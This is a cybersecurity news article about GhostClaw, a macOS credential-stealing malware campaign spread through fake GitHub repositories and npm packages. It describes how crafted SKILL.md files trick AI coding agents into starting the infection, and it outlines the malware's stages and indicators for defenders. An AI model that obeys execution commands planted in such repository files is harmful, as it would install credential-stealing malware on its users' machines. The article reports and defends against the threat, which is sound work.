GhostClaw AI Malware Targets macOS Users, Steals Credentials
Key Takeaways A new macOS malware, GhostClaw, is actively targeting developers via fake GitHub repositories and malicious npm packages. It employs social engineering and can leverage AI coding agents...
Key Takeaways
- A new macOS malware, GhostClaw, is actively targeting developers via fake GitHub repositories and malicious npm packages.
- It employs social engineering and can leverage AI coding agents for infection without direct human interaction.
- GhostClaw steals user credentials, establishes persistence, and downloads secondary payloads.
- Defenders should scrutinize installation commands, monitor for unusual
dsclusage, and verify code origins.
GhostClaw AI Malware Targets macOS Users, Steals Credentials
A sophisticated new malware campaign, dubbed GhostClaw, has emerged, specifically designed to compromise macOS systems by exploiting developer workflows and, notably, AI-assisted development environments. Threat actors are deploying this malware through deceptive GitHub repositories and malicious software packages, masquerading as legitimate development tools to steal user credentials and deploy additional malicious payloads.
Table Of Content
Evolution of the Campaign
The GhostClaw operation first came to light in early March 2026, when JFrog Security Research initially documented it under the names GhostClaw/GhostLoader. At its inception, the malware was primarily distributed through malicious npm packages, targeting developers who frequently incorporate third-party tools from public registries into their projects.
However, the campaign quickly broadened its reach beyond the npm ecosystem, transitioning to GitHub-hosted repositories. These repositories were meticulously crafted to impersonate popular developer resources such as trading bots, software development kits (SDKs), and other commonly used utilities, enhancing their perceived legitimacy.
Researchers at Jamf Threat Labs subsequently identified at least eight new samples linked to the same campaign after a thorough examination of multiple GitHub repositories. Their investigation uncovered extensive additional infrastructure and previously unknown infection vectors, confirming that GhostClaw had significantly expanded its delivery mechanisms beyond its initial npm-centric approach. A prime example of this deception was the “TradingView-Claw” repository, which garnered 386 GitHub stars, lending it a deceptive air of credibility among unsuspecting developers.
Dual-Path Infection Strategy
GhostClaw’s efficacy stems from its ingenious dual-pronged infection strategy. In one method, the malicious GitHub repositories contain README files that provide step-by-step installation instructions, guiding users to execute a shell command via `curl`.
The second, more advanced, infection vector targets AI coding agents. This is achieved through specially crafted `SKILL.md` files that define metadata and execution commands. These files are designed to trick automated development tools into unknowingly initiating the infection chain, enabling GhostClaw to compromise a system without any direct human interaction.
The broader implications of this campaign are significant, extending beyond individual developers. By embedding malicious code within trusted ecosystems like GitHub and leveraging AI-assisted tooling, attackers can achieve a far wider reach through a single delivery mechanism. Jamf Threat Labs also observed connections to other related campaigns, including Glassworm and PolinRider, which utilized similar software supply chain attack techniques. This trend highlights a growing sophistication in how threat actors distribute malware at scale.
Multi-Stage Infection and Credential Theft
Regardless of the initial infection vector, GhostClaw consistently follows a multi-stage execution chain engineered to harvest credentials and establish persistent access on the victim’s macOS system.
The infection commences with an `install.sh` script, which masquerades as a routine setup tool. This bootstrapper script first checks the host macOS version and architecture. It then silently installs a compatible version of Node.js into a user-controlled directory, cleverly circumventing the need for elevated administrative privileges. Notably, the script uses `curl` with the `–insecure` flag to download Node.js, a practice that bypasses TLS certificate verification and is rarely seen in legitimate installers.
Control then transfers to `setup.js`, a heavily obfuscated JavaScript file responsible for the critical task of credential collection. To avoid suspicion, the script clears the terminal screen and displays fake progress indicators, mimicking a legitimate SDK installation process.
Subsequently, a credential prompt appears. The password entered by the user is validated using the native macOS binary `dscl` with the `-authonly` option. This method allows the malware to confirm the validity of stolen credentials without triggering standard system authentication dialogs, which might otherwise alert the user.
If Full Disk Access has not already been granted, the malware presents AppleScript dialogs that closely mimic genuine macOS security prompts. These dialogs guide the user through the process of granting the necessary permissions in System Settings.
Once credentials are harvested and access is secured, `setup.js` communicates with its command-and-control (C2) server at `trackpipe[.]dev`. From here, it retrieves an encrypted secondary payload, which is temporarily written to `/tmp/sys-opt-{random}.js`. This temporary file is then deleted, and the malware establishes persistence by relocating itself to `~/.cache/.npm_telemetry/monitor.js` – a path strategically chosen to blend in with normal npm activity and evade detection.
What You Should Do
- Exercise extreme caution when executing installation commands from GitHub repositories, online guides, or any unverified source, even if they appear credible.
- Always verify the origin and expected behavior of any code before execution. Review scripts and package contents thoroughly.
- For security teams managing macOS environments, implement monitoring for unexpected usage of the `dscl` command, especially with the `-authonly` option, as this could indicate credential validation attempts by malware.
- Monitor for processes attempting to gain Full Disk Access or writing obfuscated files to temporary directories (`/tmp/`) or user cache directories (`~/.cache/`).
- Educate developers and users on the risks associated with supply chain attacks and the importance of scrutinizing third-party dependencies.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.